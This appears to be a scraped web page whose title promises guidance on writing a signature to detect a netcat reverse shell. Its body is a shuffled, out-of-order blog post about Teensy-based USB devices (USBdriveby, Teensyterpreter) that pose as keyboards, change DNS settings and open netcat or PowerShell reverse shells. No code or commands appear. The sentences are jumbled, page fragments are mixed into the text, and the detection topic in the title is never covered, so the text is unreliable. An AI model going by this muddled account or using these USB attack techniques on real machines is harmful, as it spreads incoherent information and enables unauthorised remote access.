How to write signature to detect netcat reverse shell
So your admin only allows USB devices from a certain vendor or device id. If you can’t trust any USB device then you may as well throw the towel in. Posted in Security Hacks Tagged DNS spoofing, hid, keyboard, mouse, reverse shell, Teensy, usb Post navigationīadusb is something that everyone is hoping won’t be a big deal but it is. Video demos of both projects after the break. Bonus points if you can do it on our Trinket Pro. We’d like to see the two projects merge into a single codebase that supports both operating systems.
With a $20 microcontroller board you can quickly fire up remote shells for… “support purposes”. The process happens in under a minute, and works on all Windows versions newer than XP. It runs command prompt as administrator, then enters a one-liner to fire up the reverse shell using Powershell.
The Teensyterpreter gives a reverse shell on Windows machines.
#How to write signature to detect netcat reverse shell code#
This allows for remote code execution on the machine. AppleScript is used to position the window in a known location, then the buttons can be reliably clicked by code running on the Teensy. After modifying DNS, a reverse shell is opened using netcat. This is possible without a password through the OS X System Preferences, but it requires emulating both keystrokes and clicks. When connected, it changes the DNS server settings to a custom IP, to allow for DNS spoofing of the victim’s machine. When connected to a computer, they act as a Human Interface Device to emulate a keyboard and mouse. Both devices are based on the Teensy development board. We’ve recently seen two examples of this: the USBdriveby and the Teensyterpreter. This lets you do some nefarious things with a simple USB microcontroller.
There’s no pop-up to confirm a device was plugged in, and no validation of whether the device should be trusted. Computers blindly trust USB devices connected to them.